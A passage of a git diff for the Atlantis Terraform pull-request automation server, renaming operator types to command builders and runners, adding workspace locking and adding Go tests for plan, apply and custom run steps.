 	var projCtxs []models.ProjectCommandContext
 
 	// If there is no config file, then we try to plan for each project that
@@ -93,7 +97,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon
 		// in the config file.
 		matchingProjects, err := p.matchingProjects(ctx.Log, modifiedFiles, config)
 		if err != nil {
-			return CommandResponse{Error: err}
+			return nil, err
 		}
 		ctx.Log.Info("%d projects are to be autoplanned based on their when_modified config", len(matchingProjects))
 
@@ -120,22 +124,21 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon
 			})
 		}
 	}
+	return projCtxs, nil
+}
+
+func (p *DefaultProjectCommandBuilder) BuildPlanCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
+	var projCtx models.ProjectCommandContext
 
-	// Execute the operations.
-	var results []ProjectResult
-	for _, pCtx := range projCtxs {
-		res := p.ProjectOperator.Plan(pCtx, nil)
-		res.Path = pCtx.RepoRelPath
-		res.Workspace = pCtx.Workspace
-		results = append(results, res)
+	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
+	if err != nil {
+		return projCtx, err
 	}
-	return CommandResponse{ProjectResults: results}
-}
+	defer unlockFn()
 
-func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse {
-	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace)
+	repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, cmd.Workspace)
 	if err != nil {
-		return CommandResponse{Error: err}
+		return projCtx, err
 	}
 
 	var projCfg *valid.Project
@@ -144,55 +147,49 @@ func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) Command
 	// Parse config file if it exists.
 	config, err := p.ParserValidator.ReadConfig(repoDir)
 	if err != nil && !os.IsNotExist(err) {
-		return CommandResponse{Error: err}
+		return projCtx, err
 	}
 	hasAtlantisYAML := !os.IsNotExist(err)
 	if hasAtlantisYAML {
 		// If they've specified a project by name we look it up. Otherwise we
 		// use the dir and workspace.
-		if ctx.Command.ProjectName != "" {
-			projCfg = config.FindProjectByName(ctx.Command.ProjectName)
+		if cmd.ProjectName != "" {
+			projCfg = config.FindProjectByName(cmd.ProjectName)
 			if projCfg == nil {
-				return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)}
+				return projCtx, fmt.Errorf("no project with name %q configured", cmd.ProjectName)
 			}
 		} else {
-			projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace)
+			projCfg = config.FindProject(cmd.Dir, cmd.Workspace)
 		}
 		globalCfg = &config
 	}
 
-	if ctx.Command.ProjectName != "" && !hasAtlantisYAML {
-		return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)}
+	if cmd.ProjectName != "" && !hasAtlantisYAML {
+		return projCtx, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)
 	}
 
-	projCtx := models.ProjectCommandContext{
+	projCtx = models.ProjectCommandContext{
 		BaseRepo:      ctx.BaseRepo,
 		HeadRepo:      ctx.HeadRepo,
 		Pull:          ctx.Pull,
 		User:          ctx.User,
 		Log:           ctx.Log,
-		CommentArgs:   ctx.Command.Flags,
-		Workspace:     ctx.Command.Workspace,
-		RepoRelPath:   ctx.Command.Dir,
-		ProjectName:   ctx.Command.ProjectName,
+		CommentArgs:   cmd.Flags,
+		Workspace:     cmd.Workspace,
+		RepoRelPath:   cmd.Dir,
+		ProjectName:   cmd.ProjectName,
 		ProjectConfig: projCfg,
 		GlobalConfig:  globalCfg,
 	}
-	projAbsPath := filepath.Join(repoDir, ctx.Command.Dir)
-	res := p.ProjectOperator.Plan(projCtx, &projAbsPath)
-	res.Workspace = projCtx.Workspace
-	res.Path = projCtx.RepoRelPath
-	return CommandResponse{
-		ProjectResults: []ProjectResult{
-			res,
-		},
-	}
+	return projCtx, nil
 }
 
-func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse {
-	repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace)
+func (p *DefaultProjectCommandBuilder) BuildApplyCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
+	var projCtx models.ProjectCommandContext
+
+	repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, cmd.Workspace)
 	if err != nil {
-		return CommandResponse{Failure: "No workspace found. Did you run plan?"}
+		return projCtx, err
 	}
 
 	// todo: can deduplicate this between PlanViaComment
@@ -202,53 +199,46 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman
 	// Parse config file if it exists.
 	config, err := p.ParserValidator.ReadConfig(repoDir)
 	if err != nil && !os.IsNotExist(err) {
-		return CommandResponse{Error: err}
+		return projCtx, err
 	}
 	hasAtlantisYAML := !os.IsNotExist(err)
 	if hasAtlantisYAML {
 		// If they've specified a project by name we look it up. Otherwise we
 		// use the dir and workspace.
-		if ctx.Command.ProjectName != "" {
-			projCfg = config.FindProjectByName(ctx.Command.ProjectName)
+		if cmd.ProjectName != "" {
+			projCfg = config.FindProjectByName(cmd.ProjectName)
 			if projCfg == nil {
-				return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)}
+				return projCtx, fmt.Errorf("no project with name %q configured", cmd.ProjectName)
 			}
 		} else {
-			projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace)
+			projCfg = config.FindProject(cmd.Dir, cmd.Workspace)
 		}
 		globalCfg = &config
 	}
 
-	if ctx.Command.ProjectName != "" && !hasAtlantisYAML {
-		return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)}
+	if cmd.ProjectName != "" && !hasAtlantisYAML {
+		return projCtx, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)
 	}
 
-	projCtx := models.ProjectCommandContext{
+	projCtx = models.ProjectCommandContext{
 		BaseRepo:      ctx.BaseRepo,
 		HeadRepo:      ctx.HeadRepo,
 		Pull:          ctx.Pull,
 		User:          ctx.User,
 		Log:           ctx.Log,
-		CommentArgs:   ctx.Command.Flags,
-		Workspace:     ctx.Command.Workspace,
-		RepoRelPath:   ctx.Command.Dir,
-		ProjectName:   ctx.Command.ProjectName,
+		CommentArgs:   cmd.Flags,
+		Workspace:     cmd.Workspace,
+		RepoRelPath:   cmd.Dir,
+		ProjectName:   cmd.ProjectName,
 		ProjectConfig: projCfg,
 		GlobalConfig:  globalCfg,
 	}
-	res := p.ProjectOperator.Apply(projCtx, filepath.Join(repoDir, ctx.Command.Dir))
-	res.Workspace = projCtx.Workspace
-	res.Path = projCtx.RepoRelPath
-	return CommandResponse{
-		ProjectResults: []ProjectResult{
-			res,
-		},
-	}
+	return projCtx, nil
 }
 
 // matchingProjects returns the list of projects whose WhenModified fields match
 // any of the modifiedFiles.
-func (p *DefaultPullRequestOperator) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Spec) ([]valid.Project, error) {
+func (p *DefaultProjectCommandBuilder) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Spec) ([]valid.Project, error) {
 	var projects []valid.Project
 	for _, project := range config.Projects {
 		log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace)
diff --git a/server/events/pull_request_operator_test.go b/server/events/project_command_builder_test.go
similarity index 100%
rename from server/events/pull_request_operator_test.go
rename to server/events/project_command_builder_test.go
diff --git a/server/events/project_operator.go b/server/events/project_command_runner.go
similarity index 57%
rename from server/events/project_operator.go
rename to server/events/project_command_runner.go
index b5e8184ec3..0db221defe 100644
--- a/server/events/project_operator.go
+++ b/server/events/project_command_runner.go
@@ -14,6 +14,7 @@
 package events
 
 import (
+	"os"
 	"path/filepath"
 	"strings"
 
@@ -41,46 +42,48 @@ type PlanSuccess struct {
 	LockURL         string
 }
 
-type ProjectOperator struct {
-	Locker            ProjectLocker
-	LockURLGenerator  LockURLGenerator
-	InitStepOperator  runtime.InitStepOperator
-	PlanStepOperator  runtime.PlanStepOperator
-	ApplyStepOperator runtime.ApplyStepOperator
-	RunStepOperator   runtime.RunStepOperator
-	ApprovalOperator  runtime.ApprovalOperator
-	Workspace         AtlantisWorkspace
-	Webhooks          WebhooksSender
+type ProjectCommandRunner struct {
+	Locker                  ProjectLocker
+	LockURLGenerator        LockURLGenerator
+	InitStepRunner          runtime.InitStepRunner
+	PlanStepRunner          runtime.PlanStepRunner
+	ApplyStepRunner         runtime.ApplyStepRunner
+	RunStepRunner           runtime.RunStepRunner
+	PullApprovedChecker     runtime.PullApprovedChecker
+	Workspace               AtlantisWorkspace
+	Webhooks                WebhooksSender
+	AtlantisWorkspaceLocker AtlantisWorkspaceLocker
 }
 
-func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr *string) ProjectResult {
+func (p *ProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCommandResult {
 	// Acquire Atlantis lock for this repo/dir/workspace.
 	lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelPath))
 	if err != nil {
-		return ProjectResult{Error: errors.Wrap(err, "acquiring lock")}
+		return ProjectCommandResult{
+			Error: errors.Wrap(err, "acquiring lock"),
+		}
 	}
 	if !lockAttempt.LockAcquired {
-		return ProjectResult{Failure: lockAttempt.LockFailureReason}
+		return ProjectCommandResult{Failure: lockAttempt.LockFailureReason}
 	}
 	ctx.Log.Debug("acquired lock for project")
 
-	// Ensure project has been cloned.
-	var projAbsPath string
-	if projAbsPathPtr == nil {
-		ctx.Log.Debug("project has not yet been cloned")
-		repoDir, cloneErr := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace)
-		if cloneErr != nil {
-			if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
-				ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
-			}
-			return ProjectResult{Error: cloneErr}
+	// Acquire internal lock for the directory we're going to operate in.
+	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
+	if err != nil {
+		return ProjectCommandResult{Error: err}
+	}
+	defer unlockFn()
+
+	// Clone is idempotent so okay to run even if the repo was already cloned.
+	repoDir, cloneErr := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace)
+	if cloneErr != nil {
+		if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
+			ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
 		}
-		projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath)
-		ctx.Log.Debug("project successfully cloned to %q", projAbsPath)
-	} else {
-		projAbsPath = *projAbsPathPtr
-		ctx.Log.Debug("project was already cloned to %q", projAbsPath)
+		return ProjectCommandResult{Error: cloneErr}
 	}
+	projAbsPath := filepath.Join(repoDir, ctx.RepoRelPath)
 
 	// Use default stage unless another workflow is defined in config
 	stage := p.defaultPlanStage()
@@ -98,10 +101,10 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr
 			ctx.Log.Err("error unlocking state after plan error: %v", unlockErr)
 		}
 		// todo: include output from other steps.
-		return ProjectResult{Error: err}
+		return ProjectCommandResult{Error: err}
 	}
 
-	return ProjectResult{
+	return ProjectCommandResult{
 		PlanSuccess: &PlanSuccess{
 			LockURL:         p.LockURLGenerator.GenerateLockURL(lockAttempt.LockKey),
 			TerraformOutput: strings.Join(outputs, "\n"),
@@ -109,20 +112,20 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr
 	}
 }
 
-func (p *ProjectOperator) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) {
+func (p *ProjectCommandRunner) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) {
 	var outputs []string
 	for _, step := range steps {
 		var out string
 		var err error
 		switch step.StepName {
 		case "init":
-			out, err = p.InitStepOperator.Run(ctx, step.ExtraArgs, absPath)
+			out, err = p.InitStepRunner.Run(ctx, step.ExtraArgs, absPath)
 		case "plan":
-			out, err = p.PlanStepOperator.Run(ctx, step.ExtraArgs, absPath)
+			out, err = p.PlanStepRunner.Run(ctx, step.ExtraArgs, absPath)
 		case "apply":
-			out, err = p.ApplyStepOperator.Run(ctx, step.ExtraArgs, absPath)
+			out, err = p.ApplyStepRunner.Run(ctx, step.ExtraArgs, absPath)
 		case "run":
-			out, err = p.RunStepOperator.Run(ctx, step.RunCommand, absPath)
+			out, err = p.RunStepRunner.Run(ctx, step.RunCommand, absPath)
 		}
 
 		if err != nil {
@@ -136,21 +139,36 @@ func (p *ProjectOperator) runSteps(steps []valid.Step, ctx models.ProjectCommand
 	return outputs, nil
 }
 
-func (p *ProjectOperator) Apply(ctx models.ProjectCommandContext, absPath string) ProjectResult {
+func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCommandResult {
+	repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Workspace)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return ProjectCommandResult{Error: errors.New("project has not been cloned–did you run plan?")}
+		}
+		return ProjectCommandResult{Error: err}
+	}
+	absPath := filepath.Join(repoDir, ctx.RepoRelPath)
+
 	if ctx.ProjectConfig != nil {
 		for _, req := range ctx.ProjectConfig.ApplyRequirements {
 			switch req {
 			case "approved":
-				approved, err := p.ApprovalOperator.IsApproved(ctx.BaseRepo, ctx.Pull)
+				approved, err := p.PullApprovedChecker.IsApproved(ctx.BaseRepo, ctx.Pull)
 				if err != nil {
-					return ProjectResult{Error: errors.Wrap(err, "checking if pull request was approved")}
+					return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")}
 				}
 				if !approved {
-					return ProjectResult{Failure: "Pull request must be approved before running apply."}
+					return ProjectCommandResult{Failure: "Pull request must be approved before running apply."}
 				}
 			}
 		}
 	}
+	// Acquire internal lock for the directory we're going to operate in.
+	unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num)
+	if err != nil {
+		return ProjectCommandResult{Error: err}
+	}
+	defer unlockFn()
 
 	// Use default stage unless another workflow is defined in config
 	stage := p.defaultApplyStage()
@@ -170,14 +188,14 @@ func (p *ProjectOperator) Apply(ctx models.ProjectCommandContext, absPath string
 	})
 	if err != nil {
 		// todo: include output from other steps.
-		return ProjectResult{Error: err}
+		return ProjectCommandResult{Error: err}
 	}
-	return ProjectResult{
+	return ProjectCommandResult{
 		ApplySuccess: strings.Join(outputs, "\n"),
 	}
 }
 
-func (p ProjectOperator) defaultPlanStage() valid.Stage {
+func (p ProjectCommandRunner) defaultPlanStage() valid.Stage {
 	return valid.Stage{
 		Steps: []valid.Step{
 			{
@@ -190,7 +208,7 @@ func (p ProjectOperator) defaultPlanStage() valid.Stage {
 	}
 }
 
-func (p ProjectOperator) defaultApplyStage() valid.Stage {
+func (p ProjectCommandRunner) defaultApplyStage() valid.Stage {
 	return valid.Stage{
 		Steps: []valid.Step{
 			{
diff --git a/server/events/project_operator_test.go b/server/events/project_command_runner_test.go
similarity index 100%
rename from server/events/project_operator_test.go
rename to server/events/project_command_runner_test.go
diff --git a/server/events/project_result.go b/server/events/project_result.go
index ca5a1ecee4..f01ccd9361 100644
--- a/server/events/project_result.go
+++ b/server/events/project_result.go
@@ -17,8 +17,12 @@ import "github.com/runatlantis/atlantis/server/events/vcs"
 
 // ProjectResult is the result of executing a plan/apply for a project.
 type ProjectResult struct {
-	Path         string
-	Workspace    string
+	ProjectCommandResult
+	Path      string
+	Workspace string
+}
+
+type ProjectCommandResult struct {
 	Error        error
 	Failure      string
 	PlanSuccess  *PlanSuccess
diff --git a/server/events/runtime/apply_step_operator.go b/server/events/runtime/apply_step_runner.go
similarity index 83%
rename from server/events/runtime/apply_step_operator.go
rename to server/events/runtime/apply_step_runner.go
index 7b4a58c80a..2cb3a50c1d 100644
--- a/server/events/runtime/apply_step_operator.go
+++ b/server/events/runtime/apply_step_runner.go
@@ -9,12 +9,12 @@ import (
 	"github.com/runatlantis/atlantis/server/events/models"
 )
 
-// ApplyStepOperator runs `terraform apply`.
-type ApplyStepOperator struct {
+// ApplyStepRunner runs `terraform apply`.
+type ApplyStepRunner struct {
 	TerraformExecutor TerraformExec
 }
 
-func (a *ApplyStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+func (a *ApplyStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
 	// todo: move this to a common library
 	planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace)
 	if ctx.ProjectName != "" {
diff --git a/server/events/runtime/apply_step_operator_test.go b/server/events/runtime/apply_step_runner_test.go
similarity index 95%
rename from server/events/runtime/apply_step_operator_test.go
rename to server/events/runtime/apply_step_runner_test.go
index 1aad3c9e23..afc5c99e30 100644
--- a/server/events/runtime/apply_step_operator_test.go
+++ b/server/events/runtime/apply_step_runner_test.go
@@ -17,7 +17,7 @@ import (
 )
 
 func TestRun_NoDir(t *testing.T) {
-	o := runtime.ApplyStepOperator{
+	o := runtime.ApplyStepRunner{
 		TerraformExecutor: nil,
 	}
 	_, err := o.Run(models.ProjectCommandContext{
@@ -30,7 +30,7 @@ func TestRun_NoDir(t *testing.T) {
 func TestRun_NoPlanFile(t *testing.T) {
 	tmpDir, cleanup := TempDir(t)
 	defer cleanup()
-	o := runtime.ApplyStepOperator{
+	o := runtime.ApplyStepRunner{
 		TerraformExecutor: nil,
 	}
 	_, err := o.Run(models.ProjectCommandContext{
@@ -49,7 +49,7 @@ func TestRun_Success(t *testing.T) {
 
 	RegisterMockTestingT(t)
 	terraform := mocks.NewMockClient()
-	o := runtime.ApplyStepOperator{
+	o := runtime.ApplyStepRunner{
 		TerraformExecutor: terraform,
 	}
 
@@ -74,7 +74,7 @@ func TestRun_UsesConfiguredTFVersion(t *testing.T) {
 
 	RegisterMockTestingT(t)
 	terraform := mocks.NewMockClient()
-	o := runtime.ApplyStepOperator{
+	o := runtime.ApplyStepRunner{
 		TerraformExecutor: terraform,
 	}
 	tfVersion, _ := version.NewVersion("0.11.0")
diff --git a/server/events/runtime/init_step_operator.go b/server/events/runtime/init_step_runner.go
similarity index 87%
rename from server/events/runtime/init_step_operator.go
rename to server/events/runtime/init_step_runner.go
index f483ecbbd9..da8ae585ff 100644
--- a/server/events/runtime/init_step_operator.go
+++ b/server/events/runtime/init_step_runner.go
@@ -6,13 +6,13 @@ import (
 )
 
 // InitStep runs `terraform init`.
-type InitStepOperator struct {
+type InitStepRunner struct {
 	TerraformExecutor TerraformExec
 	DefaultTFVersion  *version.Version
 }
 
 // nolint: unparam
-func (i *InitStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+func (i *InitStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
 	tfVersion := i.DefaultTFVersion
 	if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
 		tfVersion = ctx.ProjectConfig.TerraformVersion
diff --git a/server/events/runtime/init_step_operator_test.go b/server/events/runtime/init_step_runner_test.go
similarity index 97%
rename from server/events/runtime/init_step_operator_test.go
rename to server/events/runtime/init_step_runner_test.go
index efbf4ca283..4a1416fbae 100644
--- a/server/events/runtime/init_step_operator_test.go
+++ b/server/events/runtime/init_step_runner_test.go
@@ -44,7 +44,7 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) {
 
 			tfVersion, _ := version.NewVersion(c.version)
 			logger := logging.NewNoopLogger()
-			iso := runtime.InitStepOperator{
+			iso := runtime.InitStepRunner{
 				TerraformExecutor: terraform,
 				DefaultTFVersion:  tfVersion,
 			}
diff --git a/server/events/runtime/plan_step_operater.go b/server/events/runtime/plan_step_runner.go
similarity index 93%
rename from server/events/runtime/plan_step_operater.go
rename to server/events/runtime/plan_step_runner.go
index 30028dd487..f0e49b6ed7 100644
--- a/server/events/runtime/plan_step_operater.go
+++ b/server/events/runtime/plan_step_runner.go
@@ -15,12 +15,12 @@ import (
 const atlantisUserTFVar = "atlantis_user"
 const defaultWorkspace = "default"
 
-type PlanStepOperator struct {
+type PlanStepRunner struct {
 	TerraformExecutor TerraformExec
 	DefaultTFVersion  *version.Version
 }
 
-func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+func (p *PlanStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
 	tfVersion := p.DefaultTFVersion
 	if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
 		tfVersion = ctx.ProjectConfig.TerraformVersion
@@ -55,7 +55,7 @@ func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []str
 
 // switchWorkspace changes the terraform workspace if necessary and will create
 // it if it doesn't exist. It handles differences between versions.
-func (p *PlanStepOperator) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error {
+func (p *PlanStepRunner) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error {
 	// In versions less than 0.9 there is no support for workspaces.
 	noWorkspaceSupport := MustConstraint("<0.9").Check(tfVersion)
 	// If the user tried to set a specific workspace in the comment but their
diff --git a/server/events/runtime/plan_step_operater_test.go b/server/events/runtime/plan_step_runner_test.go
similarity index 87%
rename from server/events/runtime/plan_step_operater_test.go
rename to server/events/runtime/plan_step_runner_test.go
index bf80927b6d..01dce930ba 100644
--- a/server/events/runtime/plan_step_operater_test.go
+++ b/server/events/runtime/plan_step_runner_test.go
@@ -26,7 +26,7 @@ func TestRun_NoWorkspaceIn08(t *testing.T) {
 	tfVersion, _ := version.NewVersion("0.8")
 	logger := logging.NewNoopLogger()
 	workspace := "default"
-	s := runtime.PlanStepOperator{
+	s := runtime.PlanStepRunner{
 		DefaultTFVersion:  tfVersion,
 		TerraformExecutor: terraform,
 	}
@@ -59,7 +59,7 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) {
 	tfVersion, _ := version.NewVersion("0.8")
 	logger := logging.NewNoopLogger()
 	workspace := "notdefault"
-	s := runtime.PlanStepOperator{
+	s := runtime.PlanStepRunner{
 		TerraformExecutor: terraform,
 		DefaultTFVersion:  tfVersion,
 	}
@@ -107,7 +107,7 @@ func TestRun_SwitchesWorkspace(t *testing.T) {
 			tfVersion, _ := version.NewVersion(c.tfVersion)
 			logger := logging.NewNoopLogger()
 
-			s := runtime.PlanStepOperator{
+			s := runtime.PlanStepRunner{
 				TerraformExecutor: terraform,
 				DefaultTFVersion:  tfVersion,
 			}
@@ -162,7 +162,7 @@ func TestRun_CreatesWorkspace(t *testing.T) {
 			terraform := mocks.NewMockClient()
 			tfVersion, _ := version.NewVersion(c.tfVersion)
 			logger := logging.NewNoopLogger()
-			s := runtime.PlanStepOperator{
+			s := runtime.PlanStepRunner{
 				TerraformExecutor: terraform,
 				DefaultTFVersion:  tfVersion,
 			}
@@ -201,7 +201,7 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) {
 	terraform := mocks.NewMockClient()
 	tfVersion, _ := version.NewVersion("0.10.0")
 	logger := logging.NewNoopLogger()
-	s := runtime.PlanStepOperator{
+	s := runtime.PlanStepRunner{
 		TerraformExecutor: terraform,
 		DefaultTFVersion:  tfVersion,
 	}
@@ -243,7 +243,7 @@ func TestRun_AddsEnvVarFile(t *testing.T) {
 	// Using version >= 0.10 here so we don't expect any env commands.
 	tfVersion, _ := version.NewVersion("0.10.0")
 	logger := logging.NewNoopLogger()
-	s := runtime.PlanStepOperator{
+	s := runtime.PlanStepRunner{
 		TerraformExecutor: terraform,
 		DefaultTFVersion:  tfVersion,
 	}
@@ -265,3 +265,31 @@ func TestRun_AddsEnvVarFile(t *testing.T) {
 	terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")
 	Equals(t, "output", output)
 }
+
+func TestRun_UsesDiffPathForProject(t *testing.T) {
+	// Test that if running for a project, uses a different path for the plan
+	// file.
+	RegisterMockTestingT(t)
+	terraform := mocks.NewMockClient()
+	tfVersion, _ := version.NewVersion("0.10.0")
+	logger := logging.NewNoopLogger()
+	s := runtime.PlanStepRunner{
+		TerraformExecutor: terraform,
+		DefaultTFVersion:  tfVersion,
+	}
+	When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil)
+
+	expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/projectname-default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
+	When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "default")).ThenReturn("output", nil)
+
+	output, err := s.Run(models.ProjectCommandContext{
+		Log:         logger,
+		Workspace:   "default",
+		RepoRelPath: ".",
+		ProjectName: "projectname",
+		User:        models.User{Username: "username"},
+		CommentArgs: []string{"comment", "args"},
+	}, []string{"extra", "args"}, "/path")
+	Ok(t, err)
+	Equals(t, "output", output)
+}
diff --git a/server/events/runtime/approval_operator.go b/server/events/runtime/pull_approved_checker.go
similarity index 67%
rename from server/events/runtime/approval_operator.go
rename to server/events/runtime/pull_approved_checker.go
index 63731f3427..049f434969 100644
--- a/server/events/runtime/approval_operator.go
+++ b/server/events/runtime/pull_approved_checker.go
@@ -5,11 +5,11 @@ import (
 	"github.com/runatlantis/atlantis/server/events/vcs"
 )
 
-type ApprovalOperator struct {
+type PullApprovedChecker struct {
 	VCSClient vcs.ClientProxy
 }
 
-func (a *ApprovalOperator) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) {
+func (a *PullApprovedChecker) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) {
 	approved, err := a.VCSClient.PullIsApproved(baseRepo, pull)
 	if err != nil {
 		return false, err
diff --git a/server/events/runtime/run_step_operator_test.go b/server/events/runtime/run_step_operator_test.go
deleted file mode 100644
index 899327a695..0000000000
--- a/server/events/runtime/run_step_operator_test.go
+++ /dev/null
@@ -1,3 +0,0 @@
-package runtime_test
-
-// todo
diff --git a/server/events/runtime/run_step_operator.go b/server/events/runtime/run_step_runner.go
similarity index 77%
rename from server/events/runtime/run_step_operator.go
rename to server/events/runtime/run_step_runner.go
index 6554527be6..1b406737aa 100644
--- a/server/events/runtime/run_step_operator.go
+++ b/server/events/runtime/run_step_runner.go
@@ -9,11 +9,11 @@ import (
 	"github.com/runatlantis/atlantis/server/events/models"
 )
 
-// RunStepOperator runs custom commands.
-type RunStepOperator struct {
+// RunStepRunner runs custom commands.
+type RunStepRunner struct {
 }
 
-func (r *RunStepOperator) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) {
+func (r *RunStepRunner) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) {
 	if len(command) < 1 {
 		return "", errors.New("no commands for run step")
 	}
diff --git a/server/events/runtime/run_step_runner_test.go b/server/events/runtime/run_step_runner_test.go
new file mode 100644
index 0000000000..36262b235c
--- /dev/null
+++ b/server/events/runtime/run_step_runner_test.go
@@ -0,0 +1,50 @@
+package runtime_test
+
+import (
+	"strings"
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/events/runtime"
+	"github.com/runatlantis/atlantis/server/logging"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRunStepRunner_Run(t *testing.T) {
+	cases := []struct {
+		Command string
+		ExpOut  string
+		ExpErr  string
+	}{
+		{
+			Command: "echo hi",
+			ExpOut:  "hi\n",
+		},
+		{
+			Command: "echo hi >> file && cat file",
+			ExpOut:  "hi\n",
+		},
+		{
+			Command: "lkjlkj",
+			ExpErr:  "exit status 127: running \"lkjlkj\" in",
+		},
+	}
+
+	r := runtime.RunStepRunner{}
+	ctx := models.ProjectCommandContext{
+		Log: logging.NewNoopLogger(),
+	}
+	for _, c := range cases {
+		t.Run(c.Command, func(t *testing.T) {
+			tmpDir, cleanup := TempDir(t)
+			defer cleanup()
+			out, err := r.Run(ctx, strings.Split(c.Command, " "), tmpDir)
+			if c.ExpErr != "" {
+				ErrContains(t, c.ExpErr, err)
+				return
+			}
+			Ok(t, err)
+			Equals(t, c.ExpOut, out)
+		})
+	}
+}
diff --git a/server/events/vcs/fixtures/fixtures.go b/server/events/vcs/fixtures/fixtures.go
index e3155f1992..6939162032 100644
--- a/server/events/vcs/fixtures/fixtures.go
+++ b/server/events/vcs/fixtures/fixtures.go
@@ -15,6 +15,14 @@ package fixtures
 
 import "github.com/google/go-github/github"
 
+var PullEvent = github.PullRequestEvent{
+	Sender: &github.User{
+		Login: github.String("user"),
+	},
+	Repo:        &Repo,
+	PullRequest: &Pull,
+}
+
 var Pull = github.PullRequest{
 	Head: &github.PullRequestBranch{
 		SHA:  github.String("sha256"),
diff --git a/server/events/vcs/vcs_test.go b/server/events/vcs/vcs_test.go
new file mode 100644
index 0000000000..5333ff26fe
--- /dev/null
+++ b/server/events/vcs/vcs_test.go
@@ -0,0 +1,19 @@
+package vcs_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/vcs"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
